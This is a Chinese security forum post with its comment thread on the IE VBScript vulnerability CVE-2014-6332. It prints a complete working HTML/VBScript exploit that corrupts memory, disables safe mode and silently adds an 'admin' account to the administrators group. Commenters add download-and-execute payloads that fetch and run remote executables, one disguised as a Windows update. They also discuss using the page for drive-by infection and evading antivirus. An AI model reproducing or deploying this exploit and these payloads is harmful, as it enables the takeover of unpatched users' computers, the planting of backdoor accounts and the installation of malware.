yuange

Win95+IE3 – Win10+IE11全版本执行漏洞（含POC）

qiujianzhong2014-11-14 金币奖励

+12共477986人围观，发现 75 个不明物体系统安全

微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞（CVE-2014-6332），可以说是给windows吃了一颗大补丸。缺陷出现在VBScript的代码中，自Windows 95首次发布（19年前）以来就一直存在。袁哥的眼泪哗哗的。随便一个ie，必弹计算器。

关于微软安全补丁

微软披露了一个存在于所有Windows版本的高危漏洞。建议所有Windows用户，尤其是运行网站的用户应尽快安装微软周二发布的补丁。

《微软披露影响所有Windows版本的高危漏洞》

《Microsoft昨日发布高达16个安全补丁》

POC之一：弹记事本（By yuange1975）
CVE-2014-6332 alliedve.htm allie(win95+ie3-win10+ie11) dve copy by yuange in 2009

利用最新的漏洞写了一个XX网页，所有的IE打开后都会新增一个admin的用户，密码也是admin，分享给大家。

我看到的漏洞说明：http://www.nigesb.com/cve-2014-6332-poc.html

测试截图

POC之二：执行CMD命令，并新增用户（By qiujianzhong）

<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
 
<!--[if !IE]><!--> 本网站目前只支持IE，请使用IE打开本页面 <!--<![endif]--><br>
<!--[if IE]> 对不起，你没有权限打开本页面，请联系管理员 <![endif]-->
 
 
<!--#####漏洞利用的前提：使用IE、未打漏洞的、未开360的############################################-->
<!--#####用IE打开该页面后，电脑将会新建一个admin的用户，密码也是admin,并将IP发给自己的服务器######-->
<!--#####创建隐藏帐号请参考http://www.vfocus.net/art/20090420/4976.html###########################-->
<!--#####################          make by Anders          #######################################-->
 
 
 
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
 
<SCRIPT LANGUAGE="VBScript">
 
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "net user admin admin /add",0
shell.run "net localgroup administrators admin /add",0
shell.run "iexplore"" http://www.黑客的网页.com",0
end function
 
</script>
 
<SCRIPT LANGUAGE="VBScript">
 
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray
 
Begin()
 
function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
 
  if(instr(info,"Win64")>0)   then
     exit   function
  end if
 
  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))  
  else
     exit   function 
            
  end if
 
  win9x=0
 
  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
 
     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                   
     else 
          setnotsafemode()
     end if
  end if
end function
 
function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function
 
function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)    
       Create=True
       Exit For
    End If
  Next
end function
 
sub testaa()
end sub
 
function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2) 
 
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
 
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310 
     mydata=aa(a1)
     redim  Preserve aa(a0) 
end function
 
 
function setnotsafemode()
    On Error Resume Next
    i=mydata() 
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134) 
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0         
              redim  Preserve aa(a2)            
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0) 
 
     j=0
              j=readmemo(i+&h120+k)  
        
               Exit for
           end if
 
    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function
 
function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
 
    redim  Preserve aa(a0)
    redim   ab(a0)    
 
    redim  Preserve aa(a2)
 
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
         
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16            
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then   
                 If(IsObject(aa(a1)) = False ) Then            
                   type1=VarType(aa(a1))
                 end if              
              end if
           else
             redim  Preserve aa(a0)
             exit  function
 
           end if
        else
           if(vartype(aa(a1-1))<>0)  Then   
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if              
            end if
        end if
    end if
             
   
    If(type1=&h2f66) Then        
          Over=True     
    End If 
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If 
 
    redim  Preserve aa(a0)         
       
end function
 
function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2) 
 
    ab(0)=0  
    aa(a1)=add+4    
    ab(0)=1.69759663316747E-313      
    ReadMemo=lenb(aa(a1)) 
  
    ab(0)=0   
 
    redim  Preserve aa(a0)
end function
 
</script>
 
</body>
</html>

第一部分的漏洞不是我写的，第二部分的内容是基于第一部分的漏洞利用，分享给大家。新人编写，请大家多多指教。

这些评论亮了

Mystery(6级)肆零叁文化传媒 COO回复

http://execute.sinaapp.com/css/ie.htm 仅限IE
不过这年头真的还有逗比在用IE么。。

)25(亮了
陈冠希回复

shell.run "cmd.exe /q /c echo Set x= createObject(""Microsoft.XMLHTTP""):x.Open ""GET"",LCase(""http://x.x.x.x/KB2876333.exe""),0:x.Send():Set s = createObject(""ADODB.Stream""):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(""KB2876333.exe""),2:createobject(""wscript.shell"").run ""KB2876333.exe"",1,true >>iget.vbs & cscript iget.vbs & del /q iget.vbs",0

)16(亮了
sexmile回复

ie默认保护模式开启了，权限很低，怎么能添加用户成功

)15(亮了
汐溯溟洄(4级)是个人。回复

刚从IT之家逛过来，那里的文章说。一个存在了18年的BUG还没发现问题，就说明它是一个好BUG。所以建议不要修复，因为调整一个bug的过程中，可能会产生无数个新bug。。。。。。

)14(亮了
xxx回复

@xxoo 别在这里秀了，沙箱有毛用，如果你以为只能执行cmd，只能说明你根本没看懂他的危害

)11(亮了

发表评论

已有 75 条评论

Mystery (6级)肆零叁文化传媒 COO 2014-11-14回复1楼

http://execute.sinaapp.com/css/ie.htm 仅限IE

不过这年头真的还有逗比在用IE么。。

亮了(25)
- xiao_hen (4级)人是无法在快乐中成长的。快乐只能使人肤浅，我们在痛苦中成长，... 2014-11-14回复
  
  @Mystery 有阿，有些国企他们要求必须使用IE的。。
  
  亮了(8)
- hans_1990 (2级)Null 2014-11-14回复
  
  @Mystery 学校里的网站也全部要求必须使用IE打开的
  
  亮了(2)
- sexmile 2014-11-14回复
  
  @Mystery 不能过ie保护模式吧。
  
  亮了(3)
- 黑黑的白猫 (2级) 2014-11-14回复
  
  @Mystery ABC就是必须IE,后果你懂得
  
  亮了(1)
- 2b多 2014-11-17回复
  
  @Mystery 连市场分额统计数据都不看的人，还有脸谈用不用?! 逗比
  
  亮了(3)
  - Mystery (6级)肆零叁文化传媒 COO 2014-11-17回复
    
    @2b多哦，把数据列出来。
    
    亮了(1)
  - 2b多 2014-11-17回复
    
    @Mystery 百度浏览器市场分额 cnzz浏览器市场分额这些你不知道还谈什么多少人在用?!
    
    亮了(2)
  - Mystery (6级)肆零叁文化传媒 COO 2014-11-17回复
    
    @2b多哦，你懂的怎么这么多？真厉害。
    
    亮了(1)
- qiujianzhong (3级) 2014-11-17回复
  
  @Mystery http://www.freebuf.com/vuls/33193.html 逗比，你都认为没什么人用IE了，你为何还写IE的相关文档？请逗比回复
  
  亮了(2)
  - Mystery (6级)肆零叁文化传媒 COO 2014-11-17回复
    
    @qiujianzhong 现在没人用Win95了，那为什么还在发Win95的漏洞呢？
    
    亮了(1)
  - vvke 2014-11-18回复
    
    @Mystery 你真的确定IE没人用吗？你真的确定你用的软件嵌套的都是webkit控件吗？或者chromium？
    
    亮了(1)
  - Mystery (6级)肆零叁文化传媒 COO 2014-11-18回复
    
    @vvke 别那么较真，我说的用IE是指平时的生活中一直用IE，你说的学校要求属于被动使用，软件嵌套也是被动使用，这里是在研究技术和漏洞，叨逼叨叨逼叨的在这举反例有意思么？
    
    亮了(2)
  - vvke 2014-11-25回复
    
    @ Mystery 你让举例子说呢，说了又说别人比举反例
    
    亮了(1)
  - Mystery (6级)肆零叁文化传媒 COO 2014-11-25回复
    
    @ vvke 哦，我说的没人用就是说一个人都不用？还有，用IE在这里就是说使用纯IE，你拿个搜狗浏览器跟我说叫IE，跟我逗呢？小站不兼容IE，我还说有些小网站只允许使用360浏览器呢？如果你觉得继续讨论这个问题很有意思，那我就陪你聊。但是，请先去刷刷牙。
    
    亮了(1)
  - vvke 2014-11-28回复
    
    @ Mystery 废话个什么劲啊，真尼玛能脑补啊，你让列数据数据不是列给你了嘛，跟你这种SB较劲，我也真是喝多了，哈哈，滚一边去，别回复了。
    
    亮了(1)
He@len 2014-11-14回复2楼

逗B，你写个添加用户的干啥。

改好了以后，把他丢到网上去，再用IE直接访问，你看能下载文件不？

我是没改成。

亮了(3)
- 3 2014-11-14回复
  
  @He@len 能下载，只是你不会用
  
  亮了(2)
Social (3级) 2014-11-14回复3楼

Chrome大法好！！！

亮了(3)
- qiujianzhong (3级) 2014-11-14回复
  
  @Social Chrome是不错，我也一直用但愿以后也不要有这样的漏洞
  
  亮了(2)
LR 2014-11-14回复4楼

这个poc的链接亮了！

亮了(2)
prjf (3级) 2014-11-14回复5楼

有漏洞如果不是很短时间内修补必有利用,微软这么长时间肯定也捕获过不止一次利用此漏洞的攻击,为什么一直没修复,必有原因。

亮了(1)
- qiujianzhong (3级) 2014-11-14回复
  
  @prjf 还请大神赐教啊….
  
  亮了(1)
- playmszy (1级) 2014-11-17回复
  
  @prjf 修改一个bug，千万个bug跑出来
  
  亮了(1)
xxoo 2014-11-14回复6楼

有沙箱保护，cmd能执行成功就怪了。

亮了(1)
- xxx 2014-11-14回复
  
  @xxoo 别在这里秀了，沙箱有毛用，如果你以为只能执行cmd，只能说明你根本没看懂他的危害
  
  亮了(11)
z7y 2014-11-14回复7楼

win 8 64 IE 10 测试失败

亮了(3)
- qiujianzhong (3级) 2014-11-14回复
  
  @z7y 完善了一下：http://pan.baidu.com/s/1gdy4pyz
  
  亮了(2)
  - 我愛xxoo 2015-02-11回复
    
    @ qiujianzhong 能再發一次網盤嗎？？
    
    亮了(0)
  - qiujianzhong (3级) 2015-02-13回复
    
    @ 我愛xxoo http://pan.baidu.com/s/1o6G9vNc
    
    亮了(0)
  - xxoo 2015-02-13回复
    
    @ qiujianzhong 请问一下怎么过IE的保护模式???
    
    亮了(0)
heiman (2级) 2014-11-14回复8楼

msf版本的出来了。。。。

亮了(1)
Bakemono 2014-11-14回复9楼

【恶意评论，和谐by FB客服】

亮了(3)
Super (2级) 2014-11-14回复10楼

有什么利用价值吗

亮了(2)
- qiujianzhong (3级) 2014-11-14回复
  
  @Super 把这个HTML文件可以当作挂马文件吧，最新版http://pan.baidu.com/s/1gdy4pyz
  
  亮了(1)
error 2014-11-14回复11楼

加条添加用户的文章你就来投稿了

亮了(1)
- qiujianzhong (3级) 2014-11-14回复
  
  @error 新人刚入行，多多关照……
  
  亮了(1)
歧路逍遥 (1级) 2014-11-14回复12楼

有测试成功的吗，请分享！

亮了(1)
- qiujianzhong (3级) 2014-11-14回复
  
  @歧路逍遥只要使用IE、未打漏洞的、未开360的，都可以的…..（给周鸿祎做个广告….）
  
  亮了(1)
Gescript (2级) 2014-11-14回复13楼

国内大部分都是在大数字的保护下的，就不知道能不能在开着的情况下运行命令了。。。。。。

亮了(2)
汐溯溟洄 (4级)是个人。 2014-11-14回复14楼

刚从IT之家逛过来，那里的文章说。一个存在了18年的BUG还没发现问题，就说明它是一个好BUG。所以建议不要修复，因为调整一个bug的过程中，可能会产生无数个新bug。。。。。。

亮了(14)
s 2014-11-14回复15楼

把notepad换成了其他命令，这篇文章我看的也是醉了。

亮了(1)
LittleHann (5级)阿里巴巴安全工程师 2014-11-14回复16楼

期待原理分析

亮了(1)
- 嘻嘻哈哈 (2级) 2015-10-18回复
  
  @ LittleHann 老汉
  
  亮了(0)
fake 2014-11-14回复17楼

趋势博客有专门分析

亮了(1)
sexmile 2014-11-14回复18楼

ie默认保护模式开启了，权限很低，怎么能添加用户成功

亮了(15)
NetFly童鞋 2014-11-14回复19楼

[偷乐]还弹不弹了..//: 先收藏

亮了(0)
_啊D_ 2014-11-14回复20楼

不知道，手机上试不了

亮了(0)
林小花是好同志 2014-11-14回复21楼

哥们你太认真了……

亮了(0)
不装逼会死黑阔 2014-11-15回复22楼

这是我大天朝第一黑阔，全球第二黑阔（不知道谁是第一）袁哥的大作。几年前他就各种透露他的所谓CPU执行，超越微软当前的所有防护手段和未来几年的防护手段，误导了国内很多一流高手去翻了很久的INTEL 的手册，直到教主（妇科圣手）拿到10W$的奖金之后他才考虑透露真正的思路。黑客袁哥的丰功伟绩不是他自己吹的，都是用了事实证明的。太多牛B的漏洞了

亮了(2)
- 无才布衣 (4级) 2014-11-16回复
  
  【无谓的言论攻击作者和谐by FB客服】
  
  亮了(2)
不太安静 2014-11-14回复23楼

满眼都是眼泪啊，等微软给你修复，黄花菜都凉成渣了。可算修复了-……

亮了(0)
不太安静 2014-11-14回复24楼

满眼都是眼泪啊，等微软给你修复，黄花菜都凉成渣了。//:可算修复了-……

亮了(0)
BEHK (1级) 2014-11-15回复25楼

这个漏洞基本上没用处，普通人家电脑上，默认安装了360，360是可以完美防护的。而且IE默认是阻止的，只有不组织才可以创建用户。

亮了(1)
- 二九 2014-11-15回复
  
  @BEHK 笑了
  
  亮了(1)
Xarray (4级) 2014-11-15回复26楼

net user~~那一个在 IE9以上的没有成功~

亮了(1)
jingkonglanxing (1级) 2014-11-15回复27楼

新建用户的时候把远程桌面的组也加进去顺便把访问者IP返回给自己爽歪歪了

亮了(2)
补丁 (1级) 2014-11-15回复28楼

不知道用在手机上能不能自动下载APK等文件..?

亮了(1)
- hellen是我大哥 2014-11-19回复
  
  @补丁大哥你手机可以装ie？
  好牛叉啊
  
  亮了(1)
陈冠希 2014-11-16回复29楼

shell.run "cmd.exe /q /c echo Set x= createObject(""Microsoft.XMLHTTP""):x.Open ""GET"",LCase(""http://x.x.x.x/KB2876333.exe""),0:x.Send():Set s = createObject(""ADODB.Stream""):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(""KB2876333.exe""),2:createobject(""wscript.shell"").run ""KB2876333.exe"",1,true >>iget.vbs & cscript iget.vbs & del /q iget.vbs",0

亮了(16)
- qiujianzhong (3级) 2014-11-16回复
  
  @陈冠希冠希哥是大神、、、、
  
  亮了(1)
- playmszy (1级) 2014-11-17回复
  
  @陈冠希我试过这个写法，但是如何过杀软请大牛回复
  
  亮了(1)
  - 莫里 2014-11-18回复
    
    @playmszy 要过主动防御马还要免杀哈哈哈妥妥的肉鸡
    
    亮了(1)
- 莫里 2014-11-18回复
  
  @陈冠希大哥在那个山沟搞黑产呢
  
  亮了(1)
dosmlp (2级)我很懒，什么都不想写 2014-11-16回复30楼

ie10表示没效果

亮了(1)
YMSZ (2级) 2014-11-17回复31楼

即使曝光了，有补丁了，估计还是有不少机器有这个漏洞。

亮了(1)
谱写 (1级) 2014-11-17回复32楼

一个旧的bug会引出无数新的bug

亮了(1)
ruo (3级)诗酒趁年华 2014-11-17回复33楼

起码也要像上面添加条远程下载执行再发吧亲

亮了(1)
nilin (4级) 2014-11-17回复34楼

楼主，他们为啥叫你逗比

亮了(2)
andyhao567 (2级) 2014-11-18回复35楼

支持楼主，投稿是一种勇气。。。期待下一篇精彩的文章

亮了(2)
莫里 2014-11-18回复36楼

xp ie8 可以 win7 ie 9 M貌似不可以的
膜拜袁哥

亮了(1)
陈腊肠 2014-11-19回复37楼

@陈冠希陈腊肠，你这么犀利你家里人知道吗

亮了(1)
hellen是我大哥 2014-11-19回复38楼

win7 ie8表示可以利用，但是会弹出安全提示需要手动解锁，才会运行！

亮了(1)
- hellen是我小弟 2015-02-11回复
  
  @ hellen是我大哥新安裝的WIN7根本就沒有彈框
  
  亮了(0)
ze0r 2014-11-28回复39楼

function runmumaa()
On Error Resume Next
downurl="http://www.360.cn/x.exe"
Set Post = CreateObject("Msxml2.XMLHTTP")
Set aGet = CreateObject("ADODB.Stream")
set shell=createobject("Shell.Application")
file="D:\getinfo.exe"
Post.Open "GET",downurl,"0"
Post.Send()
aGet.Mode="3"
aGet.Type="1"
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile file,"2"
shell.ShellExecute file
end function

亮了(2)